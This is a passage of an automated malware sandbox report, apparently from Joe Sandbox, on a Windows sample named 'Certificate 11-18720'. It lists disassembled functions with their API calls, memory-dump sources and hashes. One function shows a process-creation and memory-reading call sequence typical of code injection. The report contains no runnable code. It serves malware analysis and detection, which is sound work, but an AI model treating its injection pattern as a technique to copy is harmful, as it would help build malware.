                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                    • String ID:
                                                                                    • API String ID: 3397143404-0
                                                                                    • Opcode ID: 64003dd9e531e7f853585363c7231c694fdd98eba4826f4cb4ad337da1dd2a1f
                                                                                    • Instruction ID: 7aa5b83574d5ab27fcc9893c70699201f5fc54db83b899116bf222149f3535e8
                                                                                    • Opcode Fuzzy Hash: 64003dd9e531e7f853585363c7231c694fdd98eba4826f4cb4ad337da1dd2a1f
                                                                                    • Instruction Fuzzy Hash: 46E08636581214B7D7221F54AC09FCA7B1AAB06B70F104210FF14690E097B125118798
                                                                                    Function 0060BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0060BB72
                                                                                      • Part of subcall function 005E1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,005E7A85), ref: 005E1CB1
                                                                                      • Part of subcall function 005E1C9D: GetLastError.KERNEL32(00000000,?,005E7A85), ref: 005E1CC3
                                                                                    • _free.LIBCMT ref: 0060BB83
                                                                                    • _free.LIBCMT ref: 0060BB95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                                    • Instruction ID: b2fd6adb8077d1b8a114082546091886a846e3b31657d229099a74d5cc139984
                                                                                    • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                                    • Instruction Fuzzy Hash: 00E012B1681B8247DA2C657A6E4CEF327CC5F44355724181DB49EE7286CF74EC4085A8
                                                                                    Function 005C2322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,005C24F1), ref: 005C2303
                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 005C25A1
                                                                                    • CoInitialize.OLE32(00000000), ref: 005C2618
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0063503A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3815369404-0
                                                                                    • Opcode ID: bfbfa06f4915a3d985c6e32daf741169657b56ba9b61dc0e45dba68341a9f56c
                                                                                    • Instruction ID: 454ca781059603ba71544a8c3d27a5311eb5b00280a9db631dd02df0120982d4
                                                                                    • Opcode Fuzzy Hash: bfbfa06f4915a3d985c6e32daf741169657b56ba9b61dc0e45dba68341a9f56c
                                                                                    • Instruction Fuzzy Hash: C27190B4901245AFC314EF5AA8A4555BEEFBB9B340B80632ED119CF271CB704682CF15
                                                                                    Function 00620828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _strcat.LIBCMT ref: 006208FD
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                    • _wcscpy.LIBCMT ref: 0062098C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __itow__swprintf_strcat_wcscpy
                                                                                    • String ID:
                                                                                    • API String ID: 1012013722-0
                                                                                    • Opcode ID: 0793bddff5137c8e69fb1a335547fa32075864f8892a1a5d0c4a10a1c1ad4ca4
                                                                                    • Instruction ID: 6eb3b15d8f6d0306d000ba77bfeaa76e868de9eaea955fa1c0f9c2bd2a1b8b11
                                                                                    • Opcode Fuzzy Hash: 0793bddff5137c8e69fb1a335547fa32075864f8892a1a5d0c4a10a1c1ad4ca4
                                                                                    • Instruction Fuzzy Hash: 7C911734A00615DFDB18DF18D4959A9BBE6FF89310B54806AE85A8F3A3DB30ED41CF80
                                                                                    Function 005C3A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsThemeActive.UXTHEME ref: 005C3A73
                                                                                      • Part of subcall function 005E1405: __lock.LIBCMT ref: 005E140B
                                                                                      • Part of subcall function 005C3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 005C3AF3
                                                                                      • Part of subcall function 005C3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 005C3B08
                                                                                      • Part of subcall function 005C3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,005C3AA3,?), ref: 005C3D45
                                                                                      • Part of subcall function 005C3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,005C3AA3,?), ref: 005C3D57
                                                                                      • Part of subcall function 005C3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00681148,00681130,?,?,?,?,005C3AA3,?), ref: 005C3DC8
                                                                                      • Part of subcall function 005C3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,005C3AA3,?), ref: 005C3E48
                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 005C3AB3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                    • String ID:
                                                                                    • API String ID: 924797094-0
                                                                                    • Opcode ID: d5c05cf1d3153b34afbb1960fc64688accad3fa2c38d69156e2eb25dc5076dc8
                                                                                    • Instruction ID: 6967aca34753f7067fa734eee1f2e14656525cf04bdad5c318aac39d9c75a93c
                                                                                    • Opcode Fuzzy Hash: d5c05cf1d3153b34afbb1960fc64688accad3fa2c38d69156e2eb25dc5076dc8
                                                                                    • Instruction Fuzzy Hash: 27119D71904342AFC300EF69EC09A0ABFEAFFD5710F008A1FB584872A1DB7089518B92
                                                                                    Function 005EE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___lock_fhandle.LIBCMT ref: 005EEA29
                                                                                    • __close_nolock.LIBCMT ref: 005EEA42
                                                                                      • Part of subcall function 005E7BDA: __getptd_noexit.LIBCMT ref: 005E7BDA
                                                                                      • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                    • String ID:
                                                                                    • API String ID: 1046115767-0
                                                                                    • Opcode ID: dbcb577fee1aa588b469bb12b2a09170a5ad40fa6f4464c25fc2f955bfaa94a6
                                                                                    • Instruction ID: ef6b4164e030ffbf9f8454262021de91be00d6667b3c7d3ef518cf96877ddc47
                                                                                    • Opcode Fuzzy Hash: dbcb577fee1aa588b469bb12b2a09170a5ad40fa6f4464c25fc2f955bfaa94a6
                                                                                    • Instruction Fuzzy Hash: 2211E072819AD69AD719BF6AD84A3183E627FC1331F264754E4E40F1E3DBB48D008BA1
                                                                                    Function 005DF4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005E395C: __FF_MSGBANNER.LIBCMT ref: 005E3973
                                                                                      • Part of subcall function 005E395C: __NMSG_WRITE.LIBCMT ref: 005E397A
                                                                                      • Part of subcall function 005E395C: RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000001,00000000,?,?,005DF507,?,0000000E), ref: 005E399F
                                                                                    • std::exception::exception.LIBCMT ref: 005DF51E
                                                                                    • __CxxThrowException@8.LIBCMT ref: 005DF533
                                                                                      • Part of subcall function 005E6805: RaiseException.KERNEL32(?,?,0000000E,00676A30,?,?,?,005DF538,0000000E,00676A30,?,00000001), ref: 005E6856
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 3902256705-0
                                                                                    • Opcode ID: a9d367c56188a9574e2100cf3539f781db67c740855b740bd203eac76692ea98
                                                                                    • Instruction ID: 85d3c853564324b73cfe5e355f5254c44041e81308a25b6896d135adaca34d51
                                                                                    • Opcode Fuzzy Hash: a9d367c56188a9574e2100cf3539f781db67c740855b740bd203eac76692ea98
                                                                                    • Instruction Fuzzy Hash: DDF0AF3150425FA7DB18BFADE8099DE7FE9BF40394F604427F94AD2381DBB0968087A5
                                                                                    Function 005E35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
                                                                                    • __lock_file.LIBCMT ref: 005E3629
                                                                                      • Part of subcall function 005E4E1C: __lock.LIBCMT ref: 005E4E3F
                                                                                    • __fclose_nolock.LIBCMT ref: 005E3634
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                    • String ID:
                                                                                    • API String ID: 2800547568-0
                                                                                    • Opcode ID: 220fcc770ea7a873f89161c512a8e192737e4d9fb1af655c6881e7d33cf478df
                                                                                    • Instruction ID: 12b2f47b8c988c3ec63b5f0838ec89576cdf2889c3c64107b363cd38d548df12
                                                                                    • Opcode Fuzzy Hash: 220fcc770ea7a873f89161c512a8e192737e4d9fb1af655c6881e7d33cf478df
                                                                                    • Instruction Fuzzy Hash: C1F02B31800386AADB197F77C80E76E7EA47F90370F258108E4D4AB2C1C77C8A019F51
                                                                                    Function 00F45285 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00F45A43
                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F45AD9
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F45AFB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 2438371351-0
                                                                                    • Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                                    • Instruction ID: ebbb7348ea0672ddbec757d467397b2c982d8b6878bf03411efa3302badb241d
                                                                                    • Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                                    • Instruction Fuzzy Hash: D512DE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F81CF5A
                                                                                    Function 005CE8A0 Relevance: 1.7, APIs: 1, Instructions: 190windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005CE959
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePeek
                                                                                    • String ID:
                                                                                    • API String ID: 2222842502-0
                                                                                    • Opcode ID: fccdbdc07766177a8b465192ab52d5dae9f972f69c6356f461260ed629dfc2bf
                                                                                    • Instruction ID: e88701d3d4b010c59dbd80151086d51c7690886175e67b02c40317a866df7d07
                                                                                    • Opcode Fuzzy Hash: fccdbdc07766177a8b465192ab52d5dae9f972f69c6356f461260ed629dfc2bf
                                                                                    • Instruction Fuzzy Hash: F571F9709053809FEB25CF24D849BA57FD2BB51304F18497ED8869F3A1D3719C89CB92
                                                                                    Function 005E2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __flush.LIBCMT ref: 005E2A0B
                                                                                      • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __flush__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 4101623367-0
                                                                                    • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                    • Instruction ID: 21b05212522c7194331721933a271f28bd0f2caf3fbfb7992a91b7bdfa2361df
                                                                                    • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                    • Instruction Fuzzy Hash: AF41A3716007869BDB2C8E6BC88556E7FAEBF84360F24857DE8D5C7249DBB0DD808B40
                                                                                    Function 005DED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction ID: 25ca408fbe35772eaa7a70ad87f205ad61b634cf59f5c73310156a98f339a100
                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction Fuzzy Hash: 4F31A274A001059BD728FF5CC482969FBB6FB49340B6486ABE40ADF356DA31EDC1CB90
                                                                                    Function 0062040F Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: fc8fa09e5ed3b0aef97b64d78d9291cefe22ca0620abe5847801a588de28a05e
                                                                                    • Instruction ID: 59d132ac9d96d64f5ef025eea3629e1386b20941bbd0bcaab42dd058906d3364
                                                                                    • Opcode Fuzzy Hash: fc8fa09e5ed3b0aef97b64d78d9291cefe22ca0620abe5847801a588de28a05e
                                                                                    • Instruction Fuzzy Hash: C331A275104925DFDB11AF14E09466EBBB2FF88320F20844AEA962F396D774AD06CF91
                                                                                    Function 00639A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClearVariant
                                                                                    • String ID:
                                                                                    • API String ID: 1473721057-0
                                                                                    • Opcode ID: 76a3915255cc2951ab45d059f5281ff06d857b0c9ed06c95d6c5c6c01a2ef1ec
                                                                                    • Instruction ID: bc936a86bd82f43b486cd7fd614fbb2f478ce5f3cb87e346ac33ca0f68912d59
                                                                                    • Opcode Fuzzy Hash: 76a3915255cc2951ab45d059f5281ff06d857b0c9ed06c95d6c5c6c01a2ef1ec
                                                                                    • Instruction Fuzzy Hash: BD413D745046518FDB24DF18C484B1ABFF1BF85304F19899EE9964B362C376E845CF92
                                                                                    Function 005C41A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C4214: FreeLibrary.KERNEL32(00000000,?), ref: 005C4247
                                                                                    • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,005C39FE,?,00000001), ref: 005C41DB
                                                                                      • Part of subcall function 005C4291: FreeLibrary.KERNEL32(00000000), ref: 005C42C4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$Free$Load
                                                                                    • String ID:
                                                                                    • API String ID: 2391024519-0
                                                                                    • Opcode ID: 6930fa00192bff5acd8f958da2c2b42cec9972a0b4965a6bc5f5c292a09b3ad3
                                                                                    • Instruction ID: db943c31fb6d3ebcd087a9fbeea115993c9575ec2082f76804f00c655b85f866
                                                                                    • Opcode Fuzzy Hash: 6930fa00192bff5acd8f958da2c2b42cec9972a0b4965a6bc5f5c292a09b3ad3
                                                                                    • Instruction Fuzzy Hash: B7119835600207AEDB14ABA4DC2BF9E7BA5AFC0700F10842DB596A61C1DE759A019F90
                                                                                    Function 00639B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClearVariant
                                                                                    • String ID:
                                                                                    • API String ID: 1473721057-0
                                                                                    • Opcode ID: e06256314521fa3fa8f9efdf100be3684ed29b10c45be688f962ac05af8fac2f
                                                                                    • Instruction ID: d76a6f3f2fad7644c8476e13b8b77515939f150f0433e4d5e41a9d2ebcffa7a4
                                                                                    • Opcode Fuzzy Hash: e06256314521fa3fa8f9efdf100be3684ed29b10c45be688f962ac05af8fac2f
                                                                                    • Instruction Fuzzy Hash: 8F2113745086028FDB24DF68D448B1ABBE2BF84304F14496EE99A4B362C732E845CF92
                                                                                    Function 005EAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___lock_fhandle.LIBCMT ref: 005EAFC0
                                                                                      • Part of subcall function 005E7BDA: __getptd_noexit.LIBCMT ref: 005E7BDA
                                                                                      • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
